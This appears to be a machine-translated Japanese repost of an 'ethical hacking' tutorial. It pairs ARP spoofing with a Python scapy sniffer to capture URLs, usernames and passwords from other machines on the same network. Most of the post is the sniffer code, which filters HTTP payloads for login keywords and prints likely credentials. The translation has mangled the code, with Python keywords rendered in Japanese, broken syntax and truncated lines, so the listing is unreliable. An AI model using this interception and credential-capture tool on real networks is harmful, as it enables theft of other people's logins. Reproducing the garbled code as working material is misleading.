Pythonの倫理的ハッキング - パケットスニファ(2)

 同じネットワークに接続された任意のコンピュータからパスワードをキャプチャします。 

ARP_SPOOF + PACKET_SNIFFER

  • 同じネットワーク上のコンピュータを対象とします。
  • パケットのフローをリダイレクトするarp_spoof(なりMITM
  • 参照するにはPacket_sniffer のURL、ユーザ名、およびパスワードターゲットによって送信されます。
!は/ usr / binに/ envをパイソン

から scapy.allのインポート *
 から scapy.layers.httpのインポート *のデフスニフ(インターフェース):
    scapy.all.sniff(ifaceの =インターフェース、店舗= Falseを、PRN = process_sniffed_pa​​cket)デフGET_URL(パケット):
     リターンパケット[HTTPRequestの】.Host.decode(エラーが= ' 無視')+パケット[HTTPRequestの】.Path.decode(エラー= ' 無視' DEF get_login_info(パケット):
     もしpacket.haslayer(scapy.all。生):
        負荷 =パケット[scapy.all.Raw] .load.decode(エラー=








無視
        のキーワードを [= ユーザ名ユーザーログインパスワードパス]
         のためのキーワードキーワード:
             場合は、キーワードでの負荷:
                 リターン・ロード・


デフprocess_sniffed_pa​​cket(パケット):
     もしpacket.haslayer( HTTPRequestの):
        URL = GET_URL(パケット)を
         印刷" [+] HTTPリクエスト>> " + URL)

        login_info = get_login_info(パケット)
         の場合login_info:
             印刷" \ N \ N [+]可能性のあるユーザー名/パスワード> " + login_info + " \ N \ N " 


スニフ(" eth0の"

 

おすすめ

転載: www.cnblogs.com/keepmoving1113/p/11441145.html
おすすめ